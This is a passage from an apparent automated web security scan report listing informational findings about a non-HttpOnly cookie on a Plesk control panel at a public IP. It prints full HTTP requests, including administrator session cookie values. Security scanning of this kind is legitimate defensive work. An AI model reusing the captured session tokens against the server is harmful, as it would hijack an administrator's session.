Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; psaContext=customers

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 00:04:58 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=customers; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 00:05:00 GMT
Connection: close
Content-Length: 19217

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.107. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/rename/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@3/domain@2/hosting/file-manager/rename/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@3/domain@2/hosting/file-manager/rename/?cmd=rename_dir&file=cgi-bin HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/?cmd=chdir&file=/%2F
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; psaContext=customers

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 00:04:57 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=customers; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 00:04:57 GMT
Connection: close
Content-Length: 23911

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.108. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/view/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@3/domain@2/hosting/file-manager/view/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@3/domain@2/hosting/file-manager/view/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; psaContext=customers

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 00:05:01 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=customers; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 00:05:01 GMT
Connection: close
Content-Length: 58944

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.109. https://50.22.21.242:8443/plesk/cp-access/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/cp-access/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/cp-access/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/smb/redirect/pleskin/root/?dst=%2Fplesk%2Fcp-access%2F&src=%2Fsmb%2Fsettings%2Ftools&srcController=SettingsController
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:42:57 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 01:42:57 GMT
Connection: close
Content-Length: 19428

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.110. https://50.22.21.242:8443/plesk/custom-buttons/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/custom-buttons/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/custom-buttons/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; PLESKSESSID=2b487a11e38efdea41e954b30502b2e0; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 00:30:18 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 00:30:17 GMT
Connection: close
Content-Length: 19043

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.111. https://50.22.21.242:8443/plesk/ftp-sessions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/ftp-sessions/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/ftp-sessions/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/sessions/
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 00:26:25 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 00:26:26 GMT
Connection: close
Content-Length: 20734

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.112. https://50.22.21.242:8443/plesk/logo/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/logo/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/logo/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/smb/redirect/pleskin/root/?dst=%2Fplesk%2Flogo%2F&src=%2Fsmb%2Fsettings%2Ftools&srcController=SettingsController
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; PLESKSESSID=2b487a11e38efdea41e954b30502b2e0; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 22:46:56 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 22:46:57 GMT
Connection: close
Content-Length: 16757

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.113. https://50.22.21.242:8443/plesk/notification@/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/notification@/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/notification@/ HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/smb/settings/tools
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:21:33 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 01:21:33 GMT
Content-Length: 30870

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.114. https://50.22.21.242:8443/plesk/server/components/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/server/components/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/server/components/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/smb/redirect/pleskin/root/?dst=%2Fplesk%2Fserver%2Fcomponents%2F&src=%2Fsmb%2Fsettings%2Ftools&srcController=SettingsController
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=